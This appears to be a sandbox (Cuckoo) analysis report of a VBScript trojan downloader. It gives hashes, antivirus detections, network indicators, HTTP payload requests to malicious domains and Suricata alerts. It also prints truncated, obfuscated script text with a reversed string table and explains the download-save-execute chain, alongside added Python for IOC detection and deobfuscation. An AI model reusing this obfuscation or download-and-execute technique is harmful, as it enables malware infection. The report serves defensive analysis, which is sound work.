Analysis type | VM label | Start time | End time | Duration |
---|---|---|---|---|
File (Windows) | win7-sp1-x64-hpdapp01-1 | 2019-11-18 18:32:48 | 2019-11-18 18:33:36 | 48 s |
File name | SKM_C554e67614648511.7z ==> SKM_C554e16073396317.vbs (VBS extracted from the submitted 7z archive) |
---|---|
File size | 4865 bytes |
File type | ASCII text, with CRLF line terminators |
MD5 | b3adde77551c36292de21e9f7fab7a6f |
SHA1 | 3a6921d9862ad72ab4c042592cba26b64c307a3e |
SHA256 | 0fadf3d2e8f48db9e2026c0b97c9a7bb126c3d4a281c0e57dcd31be80030c2c2 |
SHA512 | f72acf3add3e5935d04302d61b064659258b3ae48cfd941300988bacb2b5b01164a87d30d659088e480542503f49dc45720e83fa53c3dd47669aff323eadac4f |
CRC32 | 59582E55 |
Ssdeep | 96:qIixZv/u/s/6Ee4K9PL5hbczq5AamevKv0T0MWUeWPOLfC1W0oXcrwekUy3:q55/u/s/6N4ovb4jIvKca9WPOLuW0Vwv |
No host records.
Domain | Reputation | Response |
---|---|---|
amcscomputer.com | Unknown | A 216.242.171.101 |
altarek.com | Unknown | (no answer recorded) |
gulercin.com | Unknown | A 46.20.146.37 |
Antivirus engine/vendor | Detection name / rule match | Signature database date |
---|---|---|
Bkav | W32.RanpokicLTW.Trojan | 20181024 |
MicroWorld-eScan | VB:Trojan.VBS.Agent.AQD | 20181025 |
CMC | Not detected | 20181024 |
CAT-QuickHeal | VBS.Downloader.4332 | 20181024 |
ALYac | Trojan.Downloader.VBS.Agent | 20181024 |
Malwarebytes | Not detected | 20181025 |
AegisLab | Trojan.Shell.Generic.4!c | 20181024 |
TheHacker | Not detected | 20181024 |
K7GW | Not detected | 20181024 |
K7AntiVirus | Not detected | 20181024 |
Arcabit | VB:Trojan.VBS.Agent.AQD | 20181024 |
Baidu | VBS.Trojan-Downloader.Agent.tp | 20181024 |
Babable | Not detected | 20180918 |
F-Prot | VBS/Downldr.HM | 20181024 |
Symantec | VBS.Downloader.B | 20181025 |
ESET-NOD32 | VBS/TrojanDownloader.Agent.PKN | 20181025 |
TrendMicro-HouseCall | VBS_SCARAB.SMJS | 20181024 |
Avast | VBS:Downloader-ATD [Trj] | 20181024 |
ClamAV | Not detected | 20181024 |
Kaspersky | HEUR:Trojan.Script.Agent.gen | 20181024 |
BitDefender | VB:Trojan.VBS.Agent.AQD | 20181025 |
NANO-Antivirus | Trojan.Script.ExpKit.evtswh | 20181025 |
ViRobot | Not detected | 20181024 |
Rising | Downloader.VBS.MaliciousEmail!1.ACE7 (CLASSIC) | 20181025 |
Ad-Aware | VB:Trojan.VBS.Agent.AQD | 20181024 |
Sophos | Troj/VBSDl-AV | 20181024 |
F-Secure | VB:Trojan.VBS.Agent.AQD | 20181024 |
DrWeb | VBS.DownLoader.1047 | 20181024 |
Zillya | Not detected | 20181024 |
TrendMicro | VBS_SCARAB.SMJS | 20181025 |
McAfee-GW-Edition | VBS/Downloader.ea | 20181024 |
Emsisoft | VB:Trojan.VBS.Agent.AQD (B) | 20181024 |
Ikarus | Trojan-Ransom.Script.GlobeImposter | 20181024 |
Cyren | VBS/Downldr.HM | 20181025 |
Jiangmin | Not detected | 20181024 |
Avira | VBS/Drldr.Agent.4368 | 20181024 |
Antiy-AVL | Trojan[Downloader]/VBS.Agent.pkk | 20181023 |
Kingsoft | Not detected | 20181025 |
Microsoft | TrojanDownloader:VBS/Schopets.O | 20181024 |
SUPERAntiSpyware | Not detected | 20181022 |
AhnLab-V3 | VBS/Downloader.S12 | 20181024 |
ZoneAlarm | HEUR:Trojan.Script.Agent.gen | 20181024 |
Avast-Mobile | Not detected | 20181024 |
GData | VB:Trojan.VBS.Agent.AQD | 20181024 |
TotalDefense | Not detected | 20181024 |
McAfee | VBS/Downloader.ea | 20181025 |
TACHYON | Not detected | 20181025 |
VBA32 | Not detected | 20181024 |
Zoner | Not detected | 20181024 |
Tencent | Js.Trojan.Raas.Auto | 20181025 |
Yandex | Not detected | 20181024 |
MAX | malware (ai score=100) | 20181025 |
Fortinet | VBS/Nemucod.B02D!tr.dldr | 20181025 |
AVG | VBS:Downloader-ATD [Trj] | 20181024 |
Panda | Not detected | 20181024 |
Qihoo-360 | virus.vbs.qexvmc.1 | 20181025 |
No host records.

TCP connections (HTTP to the download hosts):

Source address | Source port | Destination address | Destination port |
---|---|---|---|
192.168.122.201 | 49161 | 216.242.171.101 amcscomputer.com | 80 |
192.168.122.201 | 49163 | 46.20.146.37 gulercin.com | 80 |

UDP connections (DNS queries to 192.168.122.1):

Source address | Source port | Destination address | Destination port |
---|---|---|---|
192.168.122.201 | 49310 | 192.168.122.1 | 53 |
192.168.122.201 | 49608 | 192.168.122.1 | 53 |
192.168.122.201 | 64912 | 192.168.122.1 | 53 |
URI | HTTP data |
---|---|
http://amcscomputer.com/JH67RdfgD? | GET /JH67RdfgD? HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: amcscomputer.com Connection: Keep-Alive |
http://gulercin.com/JH67RdfgD? | GET /JH67RdfgD? HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gulercin.com Connection: Keep-Alive |
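Both requests fetch the same bare token path `/JH67RdfgD?` (an empty query string) from two of the three domains the sample resolved; altarek.com returned no address, and no connection to it appears in the TCP table. The requests also carry Internet Explorer's User-Agent rather than the Firefox string assigned to `CHECHIL` in the script text, which is what a download through the Microsoft.XMLHTTP object (named, reversed, in the script's `Kullipin` string) looks like on the wire. The following Python is an added example, not part of the report or the sample: it parses raw HTTP request heads and flags the three features above. The two flagged requests are reconstructed from the table; the benign request, the function names and the path heuristic are mine.

```python
import re
from dataclasses import dataclass

# User-Agent exactly as recorded in the report's HTTP table.
IE7_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; "
          "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
          "Media Center PC 6.0; .NET4.0C; .NET4.0E)")


def _request(host, target, ua):
    """Build a raw HTTP/1.1 request head with the header set seen in the report."""
    return (f"GET {target} HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
            f"User-Agent: {ua}\r\nHost: {host}\r\nConnection: Keep-Alive\r\n\r\n")


# Constructed sample input: the two requests from the report plus one benign
# request (www.example.com, made up here) to show a non-match.
SAMPLE_REQUESTS = [
    _request("amcscomputer.com", "/JH67RdfgD?", IE7_UA),
    _request("gulercin.com", "/JH67RdfgD?", IE7_UA),
    _request("www.example.com", "/index.html",
             "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/70.0"),
]

# Network indicators copied from the report's DNS and TCP tables.
IOC_HOSTS = {"amcscomputer.com", "altarek.com", "gulercin.com",
             "216.242.171.101", "46.20.146.37"}


@dataclass
class Request:
    method: str
    target: str
    host: str
    user_agent: str


def parse_request(raw):
    """Split a raw request head into the request line and the headers we need."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers.get("host", ""), headers.get("user-agent", ""))


# One alphanumeric path segment followed by a bare "?" (empty query), as in /JH67RdfgD?
# The minimum length is my choice, not something the report states.
TOKEN_PATH = re.compile(r"^/[A-Za-z0-9]{6,}\?$")


def classify(req):
    """Return the reasons a request resembles this downloader's payload fetch ([] = clean)."""
    reasons = []
    if req.host.lower() in IOC_HOSTS:
        reasons.append("host matches report IOC")
    if TOKEN_PATH.match(req.target):
        reasons.append("single-token path with empty query")
    if req.user_agent.startswith("Mozilla/4.0 (compatible; MSIE 7.0;"):
        reasons.append("IE/WinINet-style user agent")
    return reasons


def scan(raw_requests):
    """Pair each request's Host with the reasons it was flagged."""
    return [(req.host, classify(req)) for req in map(parse_request, raw_requests)]


if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_REQUESTS):
        print(host, "->", reasons or "clean")
```

The host match is the only hard indicator; the path shape and the User-Agent are weak on their own (plenty of legitimate Windows components send the IE string) and are worth alerting on only in combination, or when the client process is a script host such as wscript.exe.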
No SMTP traffic.
No IRC requests.
No ICMP traffic.
No CIF results.
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2019-11-18 18:33:14.838417+0800 | 192.168.122.201 | 49161 | 216.242.171.101 | 80 | TCP | 2024767 | ET CURRENT_EVENTS Possible Locky Payload DL Sept 26 2017 M1 | A Network Trojan was detected |
2019-11-18 18:33:25.595188+0800 | 192.168.122.201 | 49163 | 46.20.146.37 | 80 | TCP | 2024767 | ET CURRENT_EVENTS Possible Locky Payload DL Sept 26 2017 M1 | A Network Trojan was detected |
No TLS traffic.
No Suricata HTTP events.
File name | SKM_C554e16073396317.vbs |
---|---|
Related files | C:\Users\test\AppData\Local\Temp\7z-tmp\SKM_C554e16073396317.vbs |
File size | 4865 bytes |
File type | ASCII text, with CRLF line terminators |
MD5 | b3adde77551c36292de21e9f7fab7a6f |
SHA1 | 3a6921d9862ad72ab4c042592cba26b64c307a3e |
SHA256 | 0fadf3d2e8f48db9e2026c0b97c9a7bb126c3d4a281c0e57dcd31be80030c2c2 |
CRC32 | 59582E55 |
Ssdeep | 96:qIixZv/u/s/6Ee4K9PL5hbczq5AamevKv0T0MWUeWPOLfC1W0oXcrwekUy3:q55/u/s/6N4ovb4jIvKca9WPOLuW0Vwv |
Yara | (no match recorded) |
Script text (truncated in the report):

```vbscript
Public Sub FillPointWithDefaults(Point1 )
    With Point1
        .Name = ""
        .Type = dsPoint
        .LabelLength = Len(.Name)
        .LabelOffsetX = 0
        .LabelOffsetY = -setdefPointSize \ 2 + 1
        '.LabelWidth = Paper.TextWidth(.Name)
        '.LabelHeight = Paper.TextHeight(.Name)
        .PhysicalWidth = defPointSize
        .Width = .PhysicalWidth
        ToLogicalLength .Width
        .Locus = 0
        .ParentFigure = 0
        .ZOrder = 0 'GenerateNewPointZOrder
        .Tag = 0
        .FillStyle = setdefPointFill
        .FillColor = setdefcolPointFill
        .ForeColor = setdefcolPoint
        .Shape = setdefPointShape
        .ShowName = setAutoShowPointName
        .ShowCoordinates = False
        .NameColor = setdefcolPointName
        .Visible = True
        .Enabled = True
        .Hide = False
        .InDemo = True
        .X = 0
        .Y = 0
    End With
End Sub

Function T2000(p, ddd)
    dicA = 19
    Set CruellalpineMacAttack = CreateObject("WScript.Shell")
    Save1.Type = 1
    Save1.Open
End Function

Dim Cruellalpineensurance '
Dim CruellalpineInPlaceOf '
CruellalpineTepir = "User"
Dim williams
Dim TristateTrue
Dim CruellalpineTimeTo 'As Object
Dim CruellalpineDW
CruellalpineDW = false
Dim Cruellalpinebalibob 'As Object
Dim Cruellalpinecashback 'As Object

Function Aodgraduatesalpine(strr)
    if strr = "34" then
        waitH = "Save"+"ToFile, 2"
    else
        Save1.Savetofile CruellalpineInPlaceOf , 2
    end if
End Function

Dim krapivec
Dim CruellalpineReikYaik 'As Object
Dim Save1 'As Object
Kullipin = "//^^^:ptth^^^exe.WBYzzMSVQH\^^^elifotevas^^^ydoBes"+"nopser^^^etirw^^^nepo^^^epyT^^^PmeT^^^TeG^^^ssecorP^^^llehs.tpircsW^^^noitacilppA.llehs^^^Maerts.bdodA^^^PTTHLMX.tfosorciM"
Dim CruellalpinePetir '
Dim sNodeKey '
Dim sParentKey '
CHECHIL ="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"

Public Function FolderToCopy(A,B,Pipitr6)
    Delafon = 50
    Delafon = Delafon + 11
    if Delafon > 13 then
        B.Write P <truncated>
```
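The `Kullipin` literal is the sample's string table: COM ProgIDs, method and property names, a drop-file name and a URL prefix, each written backwards and joined with `^^^`, padded with decoy code lifted from an unrelated VB project (`FillPointWithDefaults`). The routine that consumes it falls in the truncated part, so reverse-then-split is inferred from the string's shape, not read from the page. The Python below is an added example, not part of the sample or the report; the function names and the token classification heuristic are mine.

```python
import re

# The two VBS literals from the script text, concatenated as the script does.
# Raw strings so the backslash before the third "^^^" survives unchanged.
KULLIPIN = (r"//^^^:ptth^^^exe.WBYzzMSVQH\^^^elifotevas^^^ydoBes"
            r"nopser^^^etirw^^^nepo^^^epyT^^^PmeT^^^TeG^^^ssecorP^^^llehs.tpircsW"
            r"^^^noitacilppA.llehs^^^Maerts.bdodA^^^PTTHLMX.tfosorciM")


def decode_reversed_list(blob, delimiter="^^^"):
    """Mirror VBScript's Split(StrReverse(blob), delimiter): reverse the whole
    string first, then cut it at the delimiter. Reversing whole-string also
    reverses the token order, so the last segment on disk comes out first."""
    return blob[::-1].split(delimiter)


# "Library.Object" shape used by CreateObject ProgIDs (ADODB.Stream etc.).
PROGID = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")


def classify_token(tok):
    """Rough label for a recovered token; heuristic, chosen for this string table."""
    low = tok.lower()
    if low.startswith("\\") or low.endswith(".exe"):
        return "drop-file name"
    if low.startswith("http") or low == "//":
        return "url fragment"
    if PROGID.match(tok):
        return "COM ProgID"
    return "method/property"


def deobfuscate(blob):
    """Recover the token list and label each entry."""
    return [(tok, classify_token(tok)) for tok in decode_reversed_list(blob)]


if __name__ == "__main__":
    for tok, kind in deobfuscate(KULLIPIN):
        print(f"{kind:16} {tok}")
```

Read in order, the recovered tokens are Microsoft.XMLHTTP, Adodb.streaM, shell.Application, Wscript.shell, Process, GeT, TemP, Type, open, write, responseBody, savetofile, \HQVSMzzYBW.exe, http: and //: an XMLHTTP GET whose responseBody is written through an ADODB.Stream and saved as an .exe under the %TEMP% read from the WScript.Shell process environment, then launched via Shell.Application. That matches the `Save1.Type = 1`, `Save1.Open` and `Save1.Savetofile ..., 2` calls visible in the script, and the `"Save"+"ToFile, 2"` split literal in `Aodgraduatesalpine` is the same family of trick (splitting a method name so it does not appear contiguously). The mixed case in `Adodb.streaM` and `GeT` is deliberate: COM ProgIDs and HTTP methods are matched case-insensitively, so it only hurts signatures.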
Task ID | 460683 |
---|---|
Mongo ID | 5dd273c42f8f2e08f960a8c5 |
Cuckoo release | 1.4-Maldun |